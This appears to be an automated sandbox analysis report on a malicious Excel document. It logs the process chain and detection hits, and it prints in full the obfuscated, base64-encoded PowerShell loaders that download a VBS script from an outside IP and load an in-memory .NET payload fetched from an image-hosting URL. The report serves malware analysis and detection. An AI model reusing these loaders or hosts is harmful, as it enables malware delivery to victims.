Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE89A9352E		7_2_000007FE89A9352E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE89A96FEE		7_2_000007FE89A96FEE

Source: Euro confirmation Sp.xls	OLE indicator, VBA macros: true
Source: ~DF634BD35CC9B94982.TMP.0.dr	OLE indicator, VBA macros: true

Source: Euro confirmation Sp.xls	Stream path 'MBD00609F25/\x1Ole' : https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea!(!'Aq/8x}T$]4jj8`6<\|g a&ZY,q1?>+sE36$SIck+H'$T\$>wr`\%&hhF1N6Z*pvYP\|-Zr10+-}/cHB19H5GKtded3fTY67EXDjjEeW1aoazMLuY0jbDVJSBpDiuhTOThdQanLKUOSgVgLLbwELWnBHgRwd4XIHMN7SFDdTLdIUpbxV9BgIx2Lba7k2FWeDTxtfjftXghhw5MET3Blx0unzdoi4dpYaoyuDBJc6N^t)^lqt55+QC9y
Source: ~DF634BD35CC9B94982.TMP.0.dr	Stream path 'MBD00609F25/\x1Ole' : https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea!(!'Aq/8x}T$]4jj8`6<\|g a&ZY,q1?>+sE36$SIck+H'$T\$>wr`\%&hhF1N6Z*pvYP\|-Zr10+-}/cHB19H5GKtded3fTY67EXDjjEeW1aoazMLuY0jbDVJSBpDiuhTOThdQanLKUOSgVgLLbwELWnBHgRwd4XIHMN7SFDdTLdIUpbxV9BgIx2Lba7k2FWeDTxtfjftXghhw5MET3Blx0unzdoi4dpYaoyuDBJc6N^t)^lqt55+QC9y

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2041
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2008
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2041
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2008
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2041	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2008	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2041	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2008

Source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winXLS@29/38@23/5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRA285.tmp

Jump to behavior

Source: Euro confirmation Sp.xls	OLE indicator, Workbook stream: true
Source: ~DF634BD35CC9B94982.TMP.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................Y..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................4.Tk....}..w.....Y......\.......................(.P.....................x...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................4.Tk....}..w.....Y......\.......................(.P.....................x...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0:x.......Tk....0.w.....(.P............................. .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........Y......}..w............0:x.......Tk....0.w.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................Y..............0....c...Wl.....}..w....x.......@E......^...............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................Y...................c...Wl.....}..w....x.......@E......^...............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m...............................................,..............3......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............8.......8.......@"......(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................X.[k....}..w............\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".[k......a.....(.P.....................H.......*.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................X.[k....}..w............\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.4.2.......[k......a.....(.P.....................H.......$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............P.N.......[k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............P.N.......[k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............P.N.......[k......a.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............P.N.......[k......a.....(.P.............................T.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w............P.N.......[k......a.....(.P.....................H...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3......................`...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Mk....}..w....`.......\.......................(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Mk....}..w....`.......\.......................(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@._.......Mk............(.P............. .......x....... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......... .......x.......@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...x.......N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`.......}..w............@._.......Mk............(.P............. ...............l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......`.......}..w............@._.......Mk............(.P............. .......x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................`...............0....q...Wl.....}..w............@E......^...............(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................`....................q...Wl.....}..w............@E......^...............(.P............. .......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m......5k......................5k......5k.......,..............3.......................5k.............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....l...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................5k.....}..w............8.......8.......@"......(.P.....l...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................E.Sk....}..w.....5k.....\.......................(.P.....l...............(...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".Sk....8.X.....(.P.....l.......................*.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................E.Sk....}..w.....5k.....\.......................(.P.....l...............(...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.4.2.......Sk....8.X.....(.P.....l.......................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l.......................T.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Euro confirmation Sp.xls

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAg